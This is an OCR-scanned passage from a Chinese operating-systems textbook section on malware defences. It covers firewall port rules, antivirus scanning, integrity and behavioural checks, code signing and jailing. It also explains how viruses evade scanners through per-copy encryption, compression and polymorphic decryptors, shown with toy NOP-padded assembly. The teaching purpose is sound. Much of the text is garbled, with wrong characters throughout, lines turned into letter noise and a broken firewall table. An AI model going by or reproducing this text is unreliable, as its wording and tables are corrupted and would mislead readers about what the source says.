的 端口 号 (port number) ， 来 描述 机 器 上 哪 一 个 进程 来 获得 这 个 包 
(一 个 进程 能 监听 一 个 来 自 外 部 网 络 流 量 的 端口 ) 。 一 些 端口 是 和 一 
些 标准 服务 联系 在 一 起 的 。 特 别 地 ， 端 口 80 被 Web 使用， 端口 25 被 E- 


mail fil, iO 21FTP (文件 传输 协议 ) 服务 使 用 ， 但 是 大 多 数 其 他 
的 逆 口 是 锌 用 户 定 义 的 服务 使 用 的 。 在 这 样 的 条 件 下 ， 防 火 墙 可 能 按 
照 如 下 规则 配置 : 


IP 地 址 
207.68.160.190 
207.68.160.191 

21 


207.68.160.192 | 21 | Accept | 


这 些 规则 只 有 当 包 被 发 送 到 端口 80 的 时 候 ， 才 会 允许 进入 地 址 是 
207.68.160.190 的 机 器 ;这 个 机 器 的 其 他 端口 都 是 被 禁止 的 并 且 发 送 给 
这 些 端 口 的 包 都 会 被 防火 墙 自 动 丢 痉 。 同 样 ， 只 有 发 送 给 端口 25 和 21 
的 包 才 可 以 进入 其 他 两 个 机 器 。 所 有 其 他 的 网 络 流 都 是 禁止 的 。 这 个 
规则 集 使 得 攻击 者 除了 提供 的 三 个 公共 的 服务 以 外 ， 很 难 访问 到 局 域 
网 。 


虽然 有 了 防火 墙 ， 局 域 网 还 是 可 能 会 受到 攻击 。 例 如 ， 如 果 Web 服 
务 絮 是 Apache 并 且 攻 击 者 找到 了 一 个 可 以 利用 的 Apache 的 bug， 那 么 他 
可 以 发 送 一 个 很 长 的 URL 到 207.68.160.190 的 端口 80， 然 后 制造 一 个 绥 
冲 区 洪 出 ， 进 而 控制 由 防火 墙 保护 的 一 台 机 器 ， 通 过 这 个 机 器 可 以 发 
动 对 局 域 网 内 其 他 机 器 的 攻击 。 


Fy — EE te TE AK, KANARA BLE 
到 广泛 的 接受 。 这 个 游戏 的 软件 需要 某 个 端口 来 和 其 他 的 玩家 联系 ， 
所 以 游戏 设计 者 会 选择 一 个 端口 ， 比 如 9876， 并 且 告 诉 玩家 来 改变 防 
火 墙 的 设置 ， 来 允许 在 这 个 端口 网 络 流 的 进出 。 打 开端 口 的 人 现在 也 
容易 受到 这 个 端口 上 的 攻击 。 即 使 这 个 游戏 是 合法 的 ， 那 么 它 也 可 能 
包含 一 些 可 以 利用 的 bug。 打 开 越 多 的 端口 ， 被 成 功 攻击 的 机 会 残 越 
大 。 防 火 墙 上 的 每 一 个 端口 都 增加 了 攻击 通过 的 可 能 。 


除了 无 状态 防火 墙 以 外 ， 还 有 一 种 跟踪 连接 以 及 连接 状况 的 防火 
当 。 这 些 防 火 墙 能 够 更 好 地 防止 某 些 类 型 的 攻击 ， 特 别 是 那些 和 建立 
连接 有 关 的 攻击 。 另 外 ， 一 些 其 他 类 型 的 防火 墙 实现 了 入 侵 检测 系统 
(Intrusion Detection System, IDS) ， 利 用 IDS 防 火 墙 不 仅 可 以 检测 包 
的 头 部 还 可 以 用 检测 包 的 内 容 来 查找 可 疑 的 内 容 。 


软件 防火 墙 ， 有 了 时 也 叫做 个 人 防火 墙 ， 和 人 硬件 防火 墙 具有 同样 的 
功能 ， 只 不 过 是 通过 软件 方式 实现 的 。 它 们 是 附加 在 操作 系统 内 核 的 
网 络 代码 上 的 过 滤 如 ， 是 和 硬件 防火 墙 工作 机 制 一 样 的 过 滤 数 据 包 。 


9.8.2 ” 反 病 毒 和 抑制 反 病毒 技术 


正如 上 文 所 提 到 的 ， 防 火 墙 会 尽量 地 阻止 入 侵 者 进入 电脑 ， 但 是 
在 很 多 情况 下 防火 墙 会 失败 。 在 这 种 情况 下 ， 下 一 道 防线 是 由 反 恶 意 
软件 的 程序 (antimalware program) 组 成 的 。 尽 管 这 种 反 恶 意 软 件 的 程 
序 同 样 可 以 对 抗 蠕 虫 和 间谍 软件 ， 但 是 它们 通常 称 做 反 病 毒 程序 
(antivirus program) ° 病毒 尽量 地 隐藏 自己 ， 而 用 户 则 是 努力 地 发 现 
它们 ， 这 就 像 是 一 个 猫 提 老鼠 的 游戏 。 在 这 方面 ， 病 毒 很 像 rootkit， 不 
同 的 地 方 是 病毒 的 制造 者 更 强调 的 是 病毒 的 传播 速度 而 不 是 像 rookit 一 
样 注重 于 捉迷藏 。 现 在 ， 让 我 们 来 看 看 反 病 毒 软件 所 使 用 的 技术 ， 以 
及 病毒 的 制造 者 Virgil 是 怎么 应 对 这 些 技术 的 。 


1. 病 毒 扫 拉 右 


显然 一般 用 户 没 有 去 查找 竭尽 全 力 藏 身 的 大 多 数 病 毒 ， 所 以 市 
场 上 出 现 了 反 病 毒 软件 。 下 面 我 们 将 讨论 一 下 反 病 毒 软件 的 工作 原 
理 。 反 病毒 软件 公司 拥有 一 流 的 实验 室 ， 在 那里 许多 专家 长 时 间 地 跟 
踩 并 研究 不 断 诵 现 出 的 新 病毒 。 第 一 步 是 让 病毒 感染 不 执行 任何 操作 
的 程序 ， 这 类 程序 叫做 诱饵 文件 ， 然 后 获取 病毒 的 完整 内 容 。 下 一 步 
是 列 出 病毒 的 完全 代码 表 把 它 输入 已 知 病毒 的 数据 库 。 公 司 之 间 为 其 
数据 库 的 容量 而 竞争 。 发 现 新 的 病毒 就 放 到 数据 库 中 与 体育 竞赛 是 完 
全 不 同 的 。 


一 旦 反 病 毒 软件 安装 在 用 户 的 计算 机 里 ， 第 一 件 事 就 是 在 硬盘 里 
扫描 所 有 可 执行 文件 ， 看 看 是 否 能 发 现 病 毒 库 里 已 知 的 病毒 。 大 多 数 
反 病毒 公司 都 建 有 网 站 ， 从 那里 客户 可 以 下 载 新 发 现 病毒 的 特征 码 到 
自己 的 病毒 库 里 。 如 果 用 户 有 10 000 个 文件 ， 而 病毒 库 里 有 10 000 种 病 
毒 ， 当 然 需 要 一 些 高 效 的 代码 使 得 程序 得 以 更 快 地 运行 。 


由 于 有 些 已 知 病毒 总 是 在 不 断 发 生 细微 变化 ， 所 以 人 们 需要 一 种 
模糊 查询 软件 ， 这 样 即便 3 个 字 节 的 改变 也 不 会 让 病毒 逃避 检测 。 但 
和 是， 模糊 查询 不 仅 比 正常 查询 慢 ， 而 且 容 易 导 致 错误 报警 (RM) 。7 
年 前 在 巴基斯坦 ， 有 些 合法 的 文件 恰巧 包含 了 与 病毒 代码 极为 相像 的 
字符 ， 结 果 导 致 了 病毒 报警 。 用 户 这 时 往往 会 看 到 下 面 的 信息 : 


WARNING! File xyz.exe may contain the lahore-9x virus.Delete? 


DOE BAAS , TATE, DRA AY He HE 
Ko WRT RSNA, APSA ARSE o (Bed 
PRIA BST ae APT AE DBAS, EMI PSE eae o HR 
办 法 是 要 达到 一 种 微妙 的 平衡 ， 完 美的 扫描 软件 应 该 识别 病毒 的 核心 
代码 ， 这 些 核心 代码 不 会 轻易 改 变 ， 从 而 能 够 作为 病毒 的 特征 签名 来 
查找 。 


由 于 磁 副 里 的 文件 上 周 被 宣布 无 病毒 感染 后 并 不 意味 着 现在 仍 末 
被 感染 ， 所 以 人 们 需要 经 常 使 用 病毒 扫描 。 因 为 扫描 速度 很 慢 ， 所 以 


要 保持 效率 就 应 该 仅 对 上 次 扫描 后 被 改动 的 文件 进行 检查 。 但 是 ， 聪 
明 的 病毒 会 把 感染 过 的 文件 日 期 重 置 为 初始 日 期 以 逃避 检验 。 于 是 ， 
反 病 毒 程 序 修改 校 验 文件 所 在 目 孙 的 日 期 。 但 是 病毒 接着 又 把 目 孙 的 
日 期 也 改 掉 。 这 就 像 我 们 上 面 所 提 到 的 猫 提 老鼠 游戏 一 样 。 


反 病 毒 软件 的 另 一 种 方法 是 检测 文件 ， 记 录 和 存放 所 有 文件 的 长 
度 。 如 果 一 个 文件 目 上 周 以 来 突然 增加 了 许多 ， 就 有 可 能 被 感染 ， 如 


图 9-32a 所 示 。 但 是 ， 


聪明 的 病毒 可 通过 程序 压缩 原 有 文件 并 将 其 填充 


到 原 有 长 度 来 逃避 检查 。 要 使 这 种 方法 奏效 ， 病 毒 必须 还 要 包含 压缩 
和 解压 缩 过 程 ， 如 图 9-32c 所 示 。 
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图 9-32 al 一 段 程序 ，p) 已 感染 的 程序 ，q 被 压缩 的 已 感染 程序 ，d) 


加 密 的 病毒 ，e@) 带 有 加 密 压 缩 代码 的 压缩 病毒 


病毒 还 有 一 种 逃避 检测 办 法 ， 那 就 是 让 自己 在 磁盘 里 呈现 出 的 特 
征 与 病毒 数据 库 里 的 特性 不 尽 相同 。 要 达到 这 一 目标 ， 方 法 之 一 是 每 
感染 一 个 文件 就 用 不 同 的 密 钥 将 自身 加 密 。 在 复制 新 的 病毒 体 之 前 ， 
病毒 先 随机 产生 一 个 32 位 的 加 密 密 钥 ， 如 将 当前 时 间 与 内 存 里 诸如 72 
008 和 319 992 等 数字 进行 异 或 。 然 后 将 病毒 代码 与 这 一 密 钥 逐 字 节 地 异 
或 ， 加 密 后 的 结果 值 储存 在 被 感染 文件 中 ， 如 图 9-32d 所 示 。 密 钥 也 同 
时 存放 在 文件 中 。 从 保密 性 角度 来 说 ， 把 密 钥 放 进 文件 是 不 明智 的 。 
这 样 做 的 目的 无 非 是 为 了 对 付 病 毒 扫描 ， 但 却 不 能 防止 专家 在 反 病 毒 
实验 室 里 逆向 破解 出 病毒 代码 。 当 然 ， 病 毒 在 运行 时 必须 首先 对 目 己 
解密 ， 所 以 在 文件 里 也 同时 需要 解密 过 程 。 


上 述 江 略 实际 上 并 不 完善 ， 因 为 压缩 、 解 压缩 、 加 密 和 解密 等 过 
程 在 复制 每 个 病毒 体 时 都 是 一 样 的 ， 反 病毒 软件 可 以 利用 这 一 特征 来 
得 杀 病 毒 。 把 压缩 、 解 压缩 和 加 密 过 程 隐 藏 起 来 较为 容易 : 只 要 对 它 
们 加 密 并 存放 在 病毒 体 里 ， 如 图 9-32e 所 示 。 但 是 ， 解 密 过 程 不 能 被 加 
密 ， 它 必须 运行 在 硬件 上 以 便 将 病毒 体 的 其 余部 分 解密 ， 所 以 必须 用 
明文 格式 存放 。 反 病毒 软件 当然 知道 这 些 ， 所 以 它们 专门 搜索 解密 过 
程 。 


然而 ，Virgil 喜 欢笑 到 最 后 ， 所 以 他 采用 了 下 面 的 步骤 。 假 设 解密 
过 程 需要 进行 如 下 运算 ; 


X=(A+B+C-4) 


在 普通 的 双 地 址 计算 机 上 可 以 运用 汇编 语言 编写 该 运算 ， 如 图 9- 
33a 所 示 。 第 一 个 地 址 是 源 地 址 ; 第 二 个 地 址 是 目标 地 址 ， 所 以 MOV 
A，R1 是 把 变量 A 放 入 寄存 咒 R1 中 。 图 9-33b 的 代码 也 是 同样 的 意思 ， 
不 同 之 处 仅仅 在 于 代码 中 插入 了 NOP 〈 无 操作 ) 指令 而 降低 了 效率 。 


现在 整个 编码 工作 还 未 完成 。 为 了 伪装 解密 代码 ， 可 以 用 许多 方 
法 来 蔡 代 NOP。 例 如 ， 把 0 加 入 寄存 器、 目 身 异 或 、 左 移 0 位 、 跳 转 到 
下 一 个 指令 等 ， 所 有 的 都 不 做 任何 操作 。 所 以 ， 图 9-33c 在 功能 上 与 图 
9-33a 是 相同 的 。 当 病毒 复制 自身 时 ， 往 往 采 用 图 9-33c 的 代码 而 不 是 图 
9-33a， 这 样 在 日 后 运行 时 还 能 工作 。 这 种 每 次 复制 时 都 发 生变 异 的 病 


毒 叫做 多 形态 病毒 (polymorphic virus) ° 


现在 假设 在 这 段 代码 里 不 再 需要 R5 寄 存 器 。 也 就 是 说 ， 图 9-33d 与 
图 9-33a 的 功能 一 致 。 最 后 ， 在 许多 情况 下 ， 可 以 交换 指令 而 不 会 改变 
程序 功能 ， 我 们 用 图 9-33e 作 为 另 一 种 与 多 9-33a 在 逻辑 上 保持 一 致 的 代 
码 段 。 这 种 能 够 交换 机 器 码 指 令 而 不 影响 程序 功能 的 代码 叫做 变异 引 
= (mutation engine) 。 较 复杂 的 病毒 在 复制 病毒 体 时 ， 可 以 通过 变异 
引擎 产生 不 同 的 解密 代码 。 变 异 的 手段 包括 插入 一 些 没 用 而 且 没 有 人 危 
害 的 代码 ， 改 变 代 码 的 顺序 ， 区 换 寄存 器 ， 把 某 条 指令 用 它 的 等 价 指 
令 疹 换 。 变 异 引 擎 本 和 喘 与 病毒 体 一 起 也 可 以 通过 加 密 的 方法 隐 妃 起 
-> 


MOV A,R1 MOV A,R1 
ADD B,R1 NOP 
ADD C,R1 ADD B,R1 
SUB #4,R1 NOP 
MOV R1,X ADD C,R1 
NOP 
SUB #4,R1 
NOP 
MOV R1,X 
b) 
图 9-33 


MOV A,R1 MOV A,R1 
ADD #0,R1 OR R1,R1 
ADD B,R1 ADD B,R1 
OR R1,R1 MOV R1,R5 
ADD C,R1 ADD C,R1 
SHL #0,R1 SHL R1,0 
SUB #4,R1 SUB #4,R1 
JMP .+1 ADD R5,R5 
MOV R1,X MOV R1,X 
MOV R5,Y 
c) d) 
多 形态 病毒 的 实例 


MOV A,R1 
TST R1 
ADD C,R1 
MOV R1,R5 
ADD B,R1 
CMP R2,R5 


SUB #4,R1 
JMP .+1 

MOV R1,X 
MOV R5,Y 


要 求 较 差 的 反 病 毒 软件 意识 到 图 9-33a 至 图 9-33e 具 有 相同 的 代码 功 


能 是 相当 困难 的 ， 特 别 是 当 变异 3 
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件 可 以 分 析 病 毒 代码 ， 了 解 病毒 原理 ， 甚 至 可 以 试图 模拟 代码 操作 ， 
但 我 们 必须 记 住 有 成 千 上 万 的 病毒 和 成 王 上 万 的 文件 需要 分 析 ， 所 以 


每 次 测试 不 能 花费 太 多 的 时 间 ， 人 否则 运行 起 来 会 怀 人 地 慢 。 


另外 ， 依 存在 要 量 Y 里 的 值 征 为 了 让 人 们 难以 发 现 与 R5 有 关 的 代 
码 是 死 码 的 事实 ， 死 码 不 会 做 任何 事情 。 如 条 其 他 代码 段 对 Y 进 行 了 读 
一 个 写 得 十 分 好 的 变异 引擎 代码 会 产 
生 极 强 的 变种 ， 会 给 反 病 毒 软件 的 作者 市 来 嘱 梦 般 的 太 烦 。 惟 一 让 人 
安奈 的 是 这 样 的 引擎 很 难 编写 ， 所 以 Virgil 的 朋友 都 使 用 他 的 代码 ， 结 


写 ， 代 码 丈 会 看 上 去 十 分 合法 。 


果 在 病毒 界 里 并 没有 种 类 繁多 的 变异 引擎 。 


到 目前 为 止 ， 我 们 讨论 的 是 如 何 识 别 被 感染 的 可 执行 文件 里 的 病 
毒 。 而 且 ， 反 病毒 扫描 器 必须 检查 MBR、 引 导 扇 区 、 坏 证 区 列表 、 闪 
速 ROM、CMOS 等 区 域 。 但 是 如 果 有 内 存 驻 留 病毒 在 运行 会 怎样 呢 ? 
该 内 存 竹 留 病毒 不 会 家 发 现 。 更 粳 的 是 假设 运行 的 病毒 正在 控制 所 有 
的 系统 调用 ， 它 就 能 轻易 地 探测 到 反 病毒 程序 正在 读 引 导 局 区 (用 以 
查找 病毒 ) 。 为 了 阻止 反 病 毒 程序 ， 病 毒 进行 系统 调用 ， 相 反 它 把 真 
正 的 引导 区 从 坏 届 区 列表 的 藏 喘 之 地 返回 。 它 也 可 以 作 记 录 ， 在 被 扫 
描 器 检查 以 后 会 再 次 感染 所 有 的 文件 。 


为 了 防止 被 病毒 其 纹 ， 反 病毒 程序 也 可 以 会 跳 过 操作 系统 直接 去 
读物 理 磁盘 。 不 过 这 样 做 需要 具有 用 于 IDE、SCSI 和 其 他 种 类 硬盘 的 内 
置 设备 驱动 程序 ， 这 样 会 降低 反 病毒 程序 的 可 移植 性 ， 过 到 不 通用 的 
硬盘 就 会 一 筹 莫 展 。 而 且 ， 跳 过 操作 系统 来 读 取 引 导 局 区 是 可 以 的 ， 
但 是 跳 过 操作 系统 来 读 取 所 有 的 可 执行 文件 却 是 不 可 能 的 ， 所 以 仍然 
存在 病毒 产生 出 与 可 执行 文件 相关 的 欺骗 性 数据 的 危险 。 


2. 完 整 性 检查 程序 


男 一 种 完全 不 同 的 病毒 检测 方法 是 实施 完整 性 检查 (integrity 
checking) 。 采 用 这 种 方法 的 反 病毒 程序 首先 扫描 硬盘 上 的 病毒 ， 一 旦 
确信 硬盘 是 干净 的 ， 它 就 开始 为 每 个 可 执行 文件 计算 一 个 校 验 和 。 计 
算 校 验 和 的 算法 应 该 是 很 简单 的 ， 束 像 把 程序 段 中 的 所 有 字 作 为 32 位 
或 者 64 位 整数 加 起 来 求 和 一 样 简单 ， 但 是 这 种 算法 也 要 像 加 密 的 艇 列 


算法 一 样 ， 是 不 可 能 敢 同 求解 的 。 然 后 ， 要 把 一 个 目 邓 中 的 所 有 相关 
文件 的 校 验 和 写 到 一 个 文件 中 去 。 下 一 次 运行 的 时 候 ， 程 序 重新 计算 
校 验 值 ， 看 是 否 与 校 验 和 文件 里 的 值 相 匹 配 。 这 样 被 感染 的 文件 会 立 
刻 被 得 出 。 


问题 在 于 Virgil 并 不 愿意 让 病毒 被 查 出 ， 他 可 以 写 一 段 病毒 代码 把 
校 验 和 文件 移 走 。 更 糟 的 是 ， 他 可 以 计算 已 感染 病毒 的 文件 校 验 值 ， 
用 这 一 值 花 代 校 验 和 文件 里 的 正常 值 。 为 了 你 扩 校 验 值 不 钻 更 改 ， 肥 
病毒 程序 可 以 党 试 把 该 文件 藏 起 来 ， 但 对 长 时 间 研 究 反 病毒 程序 的 
Virgil 来 说 ， 这 种 方法 也 难以 奏效 。 比 较 好 的 方法 古 对 文件 加 密 以 便 使 
得 其 上 的 破坏 容易 和 被 发 现 。 理 想 状 态 是 加 密 采 用 了 智能 卡 技术 ， 加 密 
密 钥 被 放 在 必 片 里 使 得 程序 无 法 读 到 。 


3. 行 为 检查 程序 


第 三 种 反 病 毒 程序 使 用 的 方法 是 实施 行为 检查 (behavioral 
checking) 。 通 过 这 种 方法 ， 反 病毒 程序 在 系统 运行 时 驻 留 在 内 存 里 ， 
并 有 目 己 捕捉 所 有 的 系统 调用 。 这 一 方法 能 够 监视 所 有 的 系统 和 活动， 并 
试图 捕捉 任何 可 能 被 剑 疑 的 行为 。 例 如 ， 通 常 没 有 程序 会 覆盖 引导 局 
区 ， 所 以 有 这 种 企图 的 程序 几乎 可 以 肯定 是 病毒 。 同 理 ， 改 变 闪 速 
ROM 的 内 容 也 值得 怀疑 。 


(Fret BEETLE BOE LA Flot o GON, Beas A DUT Ce 
殊 的 操作 ， 除 非 是 编译 器 。 如 有 果 反 病毒 程序 检测 到 了 这 样 一 个 写 的 动 
作 并 发 出 了 警告 ， 它 希望 用 户 能 根据 当时 情形 决定 是 否 要 歼 盖 可 执行 
文件 。 同 样 ， 当 Word 用 一 个 全 是 安 的 新 文件 重 写 .doc 文 件 时 不 一 定 是 
病毒 的 杰作 。 在 Windows 中 程序 可 以 从 可 执行 文件 里 分 离 出 来 ， 并 使 用 
特殊 的 系统 调用 驻 留 内 存 。 当 然 ， 这 也 可 能 是 合法 的 ， 但 是 给 出 警告 
还 是 是 十 分 有 用 的 。 


病毒 并 不 会 被动 地 等 着 反 病毒 程序 杀 死 自己 ， 它 们 也 会 反击 。 一 
场 特别 有 趣 的 战斗 会 发 生 在 内 存 驻 留 病 毒 和 内 存 驻 留 反 病毒 程序 之 
间 。 多 年 以 前 ， 有 一 个 叫做 Core Wars 的 游戏 ， 在 游戏 里 两 个 程序 员 各 
自 放 置 程序 到 空余 的 地 址 空间 里 。 程 序 依 次 抢夺 内 存 ， 目 的 是 把 对 手 
的 程序 清理 出 去 来 扩大 自己 的 地 副 。 病 毒 与 反 病毒 程序 之 间 的 战斗 就 
有 点 像 这 个 游戏 ， 而 战场 转换 到 了 那些 并 不 布 望 成 斗 发 生 的 受害 者 的 
机 絮 里 。 更 粳 的 是 ， 病 毒 有 一 个 优势 ， 它 可 以 去 买 反 病毒 软件 来 了 解 
对 手 。 当 然 ， 一 旦 病毒 出 现 ， 反 病毒 小 组 也 会 修改 软件 ， 从 而 通 迫 
Virgil 不 得 不 再 买 新 的 版 本 。 


4. 病 毒 避 免 


每 一 个 好 的 故事 都 需要 理念 。 这 里 的 理念 是 : 


与 其 遗憾 不 如 尽量 安全 。 


避免 病毒 比 起 在 计算 机 感染 后 去 试图 追踪 它们 要 容易 得 多 。 下 面 
征 一 些 个 人 用 户 的 使 用 指南 ， 这 也 是 整个 产业 界 为 减轻 病毒 问题 所 做 
的 努力 。 


用 户 该 怎样 做 来 避免 病毒 感染 呢 ? 第 一 ， 选 择 能 提供 高 度 安全 保 
障 的 操作 系统 ， 这 样 的 系统 应 该 拥有 强大 的 核心 -用 户 态 边界 ， 分 离 提 
供 每 个 用 户 和 系统 管理 员 的 登录 密码 。 在 这 些 条 件 下 ， 溜 进来 的 病毒 
无 法 感染 系统 代码 。 


第 二 ， 仅 安装 从 可 靠 的 供应 商 处 购买 的 最 小 配置 的 软件 。 有 时 ， 
即使 这 样 也 不 能 保证 有 些 软件 公司 雇员 会 在 商业 软件 产品 里 放置 病 
毒 ， 但 这 样 做 会 有 较 大 的 帮助 。 从 Web 站 点 和 公告 板 下 载 软件 是 十 分 冒 
险 的 行为 。 


第 三 ， 购 闫 性 能 民 好 的 反 病 毒 软件 并 按 指定 要 求 使 用 。 确 保 能 够 
经 党 从 厂商 站 点 下 载 更 新 版 本 。 
第 四 ,不 要 扣 击 电子 邮件 里 的 附件 ， 告 诉 他 人 不 要 发 送 附件 给 晶 


己 。 使 用 简明 ASCII 文 本 的 邮件 比较 安全 ， 而 附件 在 打开 时 可 能 会 局 动 
病毒 程序 。 


第 五 ， 定 期 将 重要 文件 备份 到 外 部 存储 介质 ， 如 软磁盘 、CD-R 或 
磁带 等 。 在 一 系列 的 备份 介质 中 应 该 保存 不 同 的 版 本 。 这 样 ， 当 发 现 


病毒 时 就 有 机 会 还 原 被 感染 前 的 文件 。 例 如 ， 假 设 还 原 昨 天 已 被 感染 
的 备份 版 本 不 成 功 的 话 ， 还 原 上 一 周 的 版 本 也 许 会 有 用 。 


最 后 一 点 ， 抵 抗 住户 惑 ， 不 要 从 一 个 不 了 解 的 地 方 下 载 并 运行 那 
些 吸引 人 的 新 免费 软件 。 或 许 这 些 软 件 免 费 的 原因 是 : 它 的 制造 痢 想 
让 你 的 机 万 加 入 他 的 僵尸 机 融 的 大 军 中 来 。 然 而 ， 如 有 条 你 有 虚拟 机 软 
件 的 话 ， 在 虚拟 机 中 运行 这 些 不 了 解 的 软件 是 安全 的 。 


整个 业界 应 该 重视 病毒 并 改变 一 些 危 险 的 做 法 。 第 一 ， 制 造 简单 
的 操作 系统 。 铃 声 和 口哨 声 越 多 ， 安 全 漏洞 也 越 多 ， 这 就 是 现实 。 


第 二 ， 不 要 使 用 动态 文本 。 从 安全 角度 来 说 ， 动 态 文 本 是 可 怕 
的 。 浏 览 别人 提供 的 文档 时 最 好 不 要 运行 别人 提供 的 程序 。 例 如 ， 
JPEG 文 件 束 不 包含 程序 ， 所 以 也 就 不 会 含有 病毒 。 所 有 的 文档 都 应 该 
以 这 样 的 方式 工作 。 


第 三 ， 应 该 采取 措施 将 重要 的 亿 c 副 柱 面 有 这 择 性 地 写 保护 ， 防 止 
病毒 感染 程序 。 这 种 方法 必须 在 控制 右 内 部 放置 位 图 说 明 ， 位 图 里 含 
有 受 保护 做 僵 柱 面 的 分 布 多 。 只 有 当 用 户 拨 动 了 计算 机 面板 上 的 机 械 
挨 动 开关 后 ， 位 图 才能 够 修改 动 。 


第 四 ， 使 用 闪存 是 个 好 主意 ， 但 只 有 用 户 拨 动 了 外 部 开关 后 才能 
被 改动 ， 如 当 用 户 有 意识 地 安装 BIOS 升 级 程序 的 时 候 。 当 然 ， 所 有 这 
些 措施 在 没有 遭受 病毒 的 强烈 攻击 时 ， 是 不 会 引起 重视 的 。 例 如 ， 有 


些 病毒 会 攻击 金融 领域 ， 把 所 有 银行 账户 的 金额 重 置 为 0。 当 然 ， 那 时 
候 再 采取 措施 束 太 晚 了 。 


9.8.3 ”代码 签名 


一 种 完全 不 同 的 防止 恶意 软件 的 方法 〈 全 面 防御 ) ， 是 我 们 只 运 
行 那 些 来 目 可 车 的 软件 六 商 的 没有 被 修改 过 的 软件 。 马 上 我 们 会 问 ， 
用 户 如 何 知道 软件 的 确 是 来 目 它 目 己 所 声称 的 厂商， 并且 用 户 色 如 何 
知道 软件 从 它 被 生产 之 后 没有 被 修改 过 呢 。 当 我 们 从 一 个 名 声 未 知 的 
在 线 商店 中 下 载 软件 或 者 从 站 点 下 载 ActiveX 探 件 的 时 候 ， 这 个 问题 束 
显得 格外 重要 。 例 如 ， 如 果 ActiveX 控 件 来 自 一 个 著名 的 软件 公司 ， 那 
么 它 儿 乎 不 可 能 包含 一 个 木马 程序 ， 但 是 ， 用 户 如 何 确信 这 一 点 呢 ? 


一 种 被 广泛 应 用 的 解决 办 法 是 数字 签名 ， 这 部 分 内 容 在 9.2.4 世 中 
已 经 讲解 过 。 如 采用 户 只 运行 那些 由 可 信 的 地 方 制造 并 签名 的 程序 、 
插件 、 驱 动 、ActiveX 控 件 以 及 其 他 软件 ， 那 么 陷入 麻烦 的 机 会 束 会 少 
得 多 。 但 是 这 样 做 导致 的 后 果 就 是 ， 那 些 来 目 于 Snarky Software 的 新 
的 、 免 费 的 、 好 玩 的 、 人 花哨 的 游戏 可 能 非 营 不错 但 是 不 会 通过 数字 等 
名 的 检查 ， 因 为 你 不 知道 谁 制造 了 他 们 。 


代码 签名 法 是 基于 公 钥 密码 体系 。 如 某 个 软件 厂商 产生 了 一 对 密 
钥 ( 公 钥 和 私 钥 ; ， 将 公 钥 公开 ， 私 钥 妥 善 保存 。 为 了 完成 对 一 个 软 
件 签名 ， 供 应 商 首 先 将 代码 进行 散 列 函数 运算 ， 得 到 128 位 (采用 MD5 
算法 ) 、160 位 (采用 SHA-1 算 法 ) 或 256 位 (采用 SHA-256 算 法 ) 的 


值 。 然 后 通过 私 钥 加 密 取得 散 列 值 的 数字 签名 (实际 上 ， 在 使 用 时 如 
图 9-3 所 示 进 行 了 解密 ) 。 这 个 数字 签名 则 始终 伴随 着 这 个 软件 。 


当 用 户 得 到 这 个 软件 后 ， 计 算出 做 列 函数 并 保存 结 末 ， 然 后 将 附 
融 的 数字 签名 用 公 钥 进行 解密 。 接 着 ， 核 对 解密 后 的 散 列 函数 值 同 目 
己 运 算出 的 值 是 否 相等 。 如 采 相 等 ， 这 个 软件 融和 被 接受， 否则 束 作 为 
伪造 版 本 被 拒绝 。 这 里 所 用 到 的 数学 方法 使 得 任何 想 要 得 改 软件 的 人 
十 分 难以 得 手 ， 因 为 这 个 获 列 钞 数 要 同 从 真正 的 数字 铭 名 中 解密 出 来 
的 歼 列 钞 数 匹配 。 在 没有 私 钥 的 情况 下 通过 产生 匹配 的 假 数 子 签 名 十 
十 分 困难 的 。 签 名 和 校 验 的 过 程 如 图 9-34 所 示 。 


软件 供应 商 

软件 供应 商 、，， 
产生 签名 验证 签名 

H1 = hash (Program) 

H2 = decrypt(Signature) 


如 果 H1 = H2， 则 接受 程序 


LF || H= hash (Program) 
Signature = encrypt(H) 


Al 9-34 代码 等 名 的 工作 原理 


| 


页 能 够 包含 代码 ， 比 如 AcitiveX 控 件 ， 以 及 各 种 脚本 语言 写 出 的 
代码 。 通 第 这 些 代 码 会 伞 签名 ， 而 浏览 右 会 目 动 地 检查 这 些 签名 。 当 
然 ， 为 了 验证 签名 ,浏览 器 需要 软件 厂商 的 公 和 钥 ， 它 们 通常 和 代码 在 


一 起 。 和 公 钥 一 起 的 还 有 被 某 个 CA 签名 过 的 证 书 。 如 果 浏 览 器 已 经 保 
存 了 这 个 CA 的 公 角 的话， 它 可 以 目 己 验证 这 个 证 书 。 如 末 这 个 证 书 是 
被 浏览 器 所 不 知道 的 某 个 CA 签名 的 话 ， 那 么 它 会 弹出 一 个 对 话 框 询问 


是 否 接 受 这 个 证 书 。 


9.8.4 [AAs 


一 个 古老 的 俄国 谚语 说 : “相信 但 需要 验证 。” 很 明显 地 ， 上 古代 的 
俄国 人 在 头脑 中 束 已 经 清楚 地 有 了 软件 的 概念 。 即 使 一 个 软件 已 经 被 
签名 了 ， 一 个 好 的 态度 是 去 核实 它 是 否 都 能 正常 运行 。 做 这 件 事 情 的 
一 种 技术 是 囚禁 (jailing) ， 如 图 9-35 所 示 。 


图 9-35 ”办 禁 的 操作 过 程 


如 图 9-35， 一 个 新 被 接受 的 程序 会 作为 一 个 标 有 “办 犯 * 的 标签 的 
进程 来 运行 。 这 个 “ 狱 座 ”是 一 个 可 信任 的 (系统 的 ) 进程， 可 以 监管 
办 犯 进 程 的 行为 。 当 一 个 被 监禁 的 进程 作出 一 个 系统 调用 的 时 候 ， 系 
统 调 用 不 会 被 执行 ， 而 是 把 控制 移交 给 狱 举 进程 (通过 一 个 内 核 陷 
Br) 并 把 系统 调用 号 和 参数 传递 给 它 。 这 个 狱 誉 进程 会 判断 是 否 这 个 


系统 调用 被 允许 。 例 如 ， 如 采 被 监禁 的 进程 试图 和 一 个 狱 蓉 进程 不 知 
道 的 远程 主机 建立 一 个 网 络 连 授 ， 这 个 系统 调用 会 被 拒绝 然后 该 囚犯 
进程 被 结束 。 如 采 这 个 系统 调用 是 可 以 接受 的 ， 那 么 狐 鞭 进程 会 通知 
内 核 ， 由 内 核 来 执行 该 系统 调用 。 通 过 使 用 这 种 方法 ， 不 正确 的 行为 
会 在 它 引起 麻烦 之 前 被 捕捉 到 。 


内 禁 有 很 多 的 实现 方法 。 有 一 种 方法 可 以 在 不 需要 修改 内 核 的 情 
况 下 ， 在 几乎 任何 一 个 UNIX 系 统 上 实现 ， 这 种 方法 是 Vant Noordende 
等 人 在 2007 年 提出 的 。 在 nutshell 中 ， 这 个 方法 使 用 普通 的 UNIX 调 试 
功能 ， 让 狱 众 进程 作为 调试 者 而 囚犯 进程 作为 被 调试 者 。 这 种 情况 
